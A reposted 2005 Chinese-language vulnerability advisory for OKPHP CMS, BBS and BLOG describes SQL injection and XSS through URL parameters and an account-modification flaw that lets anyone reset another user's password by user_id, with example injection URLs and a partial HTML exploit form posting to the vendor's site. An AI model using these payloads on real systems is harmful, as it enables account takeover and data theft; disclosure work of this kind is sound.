程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> okphp系列產品的多個漏洞

okphp系列產品的多個漏洞

編輯：關於PHP編程

本文作者：SuperHei
文章性質：原創
發布日期：2005-08-14
程序描敘
　　OKPHP是由www.okphp.com開發一套專業的網站管理系統，目前產品包括：Okphp CMS， Okphp BBS，Okphp BLOG。由於對變量的過濾不嚴密及密碼認證不嚴，導致sql注射，xss，隱藏變量post攻擊從跨權限操作。
漏洞攻擊
1、SQl注射及xss
　　“幾乎” 存在於各個變量裡，如：forum.php

http://www.xxx.com/forum.php?action=view_forum&forum_id={sql}
http://cn.okphp.com/forum.php?action=view_forum&forum_id=‘xss
.......
2、隱藏變量post攻擊
　　在提交request.php?action=user_modify 修改用戶資料時，沒有密碼認證導致通過user_id修改容易用戶密碼及資料；
Exp：

<html>
<head>
<title>Okphp Discussions - powered by okphp BBS</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="bbs/themes/default/css/darkblue/css.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#CCCCCC" text="#000000">
<table class="forumline2" cellspacing="1" cellpadding="3" border="0">
<form name="form1" method="post" action="http://cn.okphp.com/forum.php" enctype="multipart/form-data">
<tr>
<th colspan="2" background="bbs/themes/default/images/darkblue/th_bg.gif">修改信息</th>
</tr>
<tr class="row1"> </tr>
<tr class="row2">
<td width="20%" valign="top" align="right">密碼</td>
<td width="80%">
<p>
<input type="password" name="password1" size="20">
重復輸入

關於PHP編程

CakePHP架構入門

　　(一)簡介　　本文主要介紹CakePHP架構

smarty模板引擎之分配數據類型，smarty模板數據類型

smarty模板引擎之分配數據類型，smarty模板數據類型

php上傳apk後自動提取apk包信息的使用(示例下載)

進入公司第一個項目就是做market市場。所以後台要上傳A

PHP 無限分類三種方式非函數的遞歸調用！

php無限分類大致有三種方式，　　1、數據庫通過設置父類

PHP中常用的數組操作方法筆記整理，數組操作方法

PHP中常用的數組操作方法筆記整理，數組操作方法概述要訪問

wamp開發環境配置之配置Apache虛擬主機，wampapache

wamp開發環境配置之配置Apache虛擬主機，wampap